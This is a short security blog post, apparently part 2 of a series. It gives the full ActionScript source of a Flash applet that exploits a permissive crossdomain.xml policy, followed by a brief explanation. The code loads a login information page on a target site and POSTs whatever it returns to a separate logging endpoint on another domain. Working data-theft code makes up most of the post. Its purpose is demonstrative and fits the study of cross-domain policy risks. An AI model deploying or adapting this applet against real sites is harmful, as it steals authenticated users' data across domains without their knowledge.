Liberal Crossdomain.xml Example- Part 2

As a followup to Liberal Crossdomain.xml Exploit Example – Part 1, this is the source for the Flash app.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;
 
 public class flasher extends Sprite {
  public function flasher() {
   // Target URL from where the data is to be retrieved
   var readFrom:String = "http://rubysecurity.info/login/info.php";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try 
   {
    getLoader.load(readRequest);
   } 
   catch (error:Error) 
   {
   }
  }
 
  private function eventHandler(event:Event):void 
  { 
   // URL to which retrieved data is to be sent
   var sendTo:String = "http://injectionvector.com/flasher/log.php"
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try 
   {
    sendLoader.load(sendRequest);
   } 
   catch (error:Error) 
   {
   }
  }
 }
}

It’s really a fairly simple Flash applet. The class is called flasher and extends Sprite. Sprite is a base class for UI components that don’t use the timeline. In the constructor it creates a URLRequest object to data from the location specified in the readFrom variable via a URLLoader object. It then sets an event handler, called eventhandler, that is called when that read is done. When the read is done, it then basically does the same thing, but posts to the variable specified in sendTo and sets the body of the request to be the data received from the first step.

Note: This is based off an example that I found, but have misplaced. Once found, I will update the post to reference it.

This entry was posted in Security. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *